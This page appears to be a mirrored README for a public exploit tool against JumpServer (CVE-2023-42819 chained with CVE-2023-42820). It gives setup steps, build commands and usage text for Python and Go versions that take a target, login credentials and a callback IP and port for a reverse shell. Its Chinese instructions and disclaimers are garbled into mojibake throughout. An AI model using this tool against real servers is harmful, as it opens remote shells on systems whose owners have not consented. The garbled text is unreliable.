Share
## https://sploitus.com/exploit?id=A3FB264C-22FF-5C68-B701-7F126235D51F
# CVE-2023-42819
CVE-2023-42819
## ๆผๆด่ฏดๆ
JumpServer ไปปๆๆไปถๅๅ
ฅๆผๆด
CVE-2023-42819 + CVE-2023-42820 = GetShell
## USAGE
1. ๅฐ่ๆฌๅๆ้ๆไปถๆพๅจๅไธไธช็ฎๅฝ
2. ็กฎ่ฎคๅทฒๅฎ่ฃ
Google Chrome๏ผๅนถ่ทๅ Google Chrome ็็ๆฌๅท
```cmd
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
```
3. ๆ นๆฎ Google Chrome ๅฏนๅบ็็ๆฌๅทๅ็ณป็ปไธ่ฝฝ chromedriver ไนๅ๏ผๆพ็ฝฎๅจ webdriver ไธญ
ๆๆฐ็ๆฌ๏ผhttps://googlechromelabs.github.io/chrome-for-testing/
ๅๅฒ็ๆฌ๏ผhttps://chromedriver.chromium.org/downloads/version-selection
~~่ฆๆฑ็ๅค : (~~
4. ็ๅฌๅฏนๅบ็ IP ๅ Port๏ผ็ญๅพ
ๅๅผน Shell
### Python Version
```python
โโโโโโโโโโ โโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโโโโโโโโ โโโโโโ โโโ โโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ โโโ โโโโโโโ
โโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโ
โโโโโโโ โโโโโ โโโโโโโโ โโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโ โโโโโโ โโโ โโโโโโ
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: ไปฃ็ ไป
ไพๅญฆไน ไฝฟ็จ๏ผ่ฏทๅฟ็จไบๅ
ถไป็จ้
usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]
CVE-2023-42819 by C1ph3rX13.
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target url
-u USERNAME, --username USERNAME
account username
-p PASSWORD, --password PASSWORD
account password
--ip IP shell ip
--port PORT shell port
--proxy PROXY proxy to http://ip:port
```
![image-1](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-42819/main/images/CVE-2023-42819-1.png)
![image-1](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-42819/main/images/CVE-2023-42819-2.png)
### Go Version
#### Build
```powershell
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath
```
#### Run
```powershell
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
โโโโโโโโโโ โโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโโโโโโโโ โโโโโโ โโโ โโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ โโโ โโโโโโโ
โโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโ
โโโโโโโ โโโโโ โโโโโโโโ โโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโ โโโโโโ โโโ โโโโโโ
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: ไปฃ็ ไป
ไพๅญฆไน ไฝฟ็จ๏ผ่ฏทๅฟ็จไบๅ
ถไป็จ้
Usage of CVE-2023-42819.exe:
-ip string
Shell IP
-p string
Account Password
-port string
Shell Port
-proxy string
Proxy Url
-t string
Target Url
-u string
Account Username
```
![image-1](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-42819/main/images/CVE-2023-42819-Go.png)
## TODO
- [x] ่งฃๅณ่ทจๅ็ๆนๅผไธๅคไผ้
- [x] ไฝฟ็จ httpx ้ๅ
- [x] ๆทปๅ EXP func
- [x] ไฝฟ็จ go-resty ้ๅ
- [ ] ็ปๅฝ่พ้ๅฏ็ ๅฏผ่ดๅบ็ฐ้ช่ฏ็ ็ป่ฟ
- [ ] ๅขๅ ๅๅผน Shell ็็ฑปๅ
- [x] ไฝฟ็จ headless ๆจกๅผๅ
ผๅฎน Linux
- [x] ๅขๅ `http, https, socks`ไปฃ็
- [x] CVE-2023-42819 + CVE-2023-42820 ไธ้ฎ GetShell
- [x] ~~Flag ็ซ่ฟไนๅค๏ผไน่ฎธๅฎๆไธไบไบ : (~~
## ็ปดๆค
- [x] 2023-10-18 ๅขๅ ็ฝ็ซ่ชๅจๅๆฃๆต็ป่ฟ - Python Version
- [x] 2023-10-18 ้ๆๅฎขๆท็ซฏๅฝๆฐ
- [x] 2023-10-18 ็ฎๅ่ฟ่ก้ป่พ
- [x] 2023-10-18 Linux ๆต่ฏ OK - Go Version
## ๅ
่ดฃๅฃฐๆ
1. ๆฌๅทฅๅ
ทไป
้ขๅๆฅๆๅๆณๆๆ็ๆธ้ๆต่ฏๅฎๅ
จไบบๅๅ่ฟ่กๅธธ่งๆไฝ็็ฝ็ป่ฟ็ปดไบบๅ๏ผ็จๆทๅฏๅจๅๅพ่ถณๅคๅๆณๆๆไธ้ๅ็จ็ๅๆไธ่ฟ่กไธ่ฝฝใๅคๅถใไผ ๆญๆไฝฟ็จใ
2. ๅจไฝฟ็จๆฌๅทฅๅ
ท็่ฟ็จไธญ๏ผๆจๅบ็กฎไฟ่ชๅทฑ็ๆๆ่กไธบ็ฌฆๅๅฝๅฐๆณๅพๆณ่ง๏ผไธไธๅพๅฐๆญค่ฝฏไปถ็จไบ่ฟๅไธญๅฝไบบๆฐๅ
ฑๅๅฝ็ธๅ
ณๆณๅพ็ๆดปๅจใๆฌๅทฅๅ
ทๆๆไฝ่
ๅ่ดก็ฎ่
ไธๆฟๆ
็จๆทๆ
่ชไฝฟ็จๆฌๅทฅๅ
ทไปไบไปปไฝ่ฟๆณๆดปๅจๆไบง็็ไปปไฝ่ดฃไปปใ